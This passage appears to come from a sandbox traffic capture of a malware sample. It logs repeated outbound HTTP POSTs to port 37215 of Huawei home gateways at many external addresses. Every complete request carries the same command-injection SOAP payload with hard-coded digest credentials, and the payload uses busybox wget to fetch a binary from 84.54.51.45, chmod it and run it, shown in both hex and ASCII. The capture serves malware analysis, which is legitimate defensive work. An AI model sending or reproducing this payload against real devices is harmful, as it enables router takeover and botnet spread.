                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1824192.168.2.154448841.66.71.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465818882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1825192.168.2.154248241.171.114.13737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465838909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1826192.168.2.155099241.27.170.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465846062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1827192.168.2.155145041.13.167.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465857029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1828192.168.2.154541041.45.177.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465881109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1829192.168.2.153960041.27.77.12737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465904951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1830192.168.2.155586441.164.163.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465949059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1831192.168.2.153725041.152.81.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465961933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1832192.168.2.156027441.124.226.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465969086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1833192.168.2.155833441.47.217.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465969086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
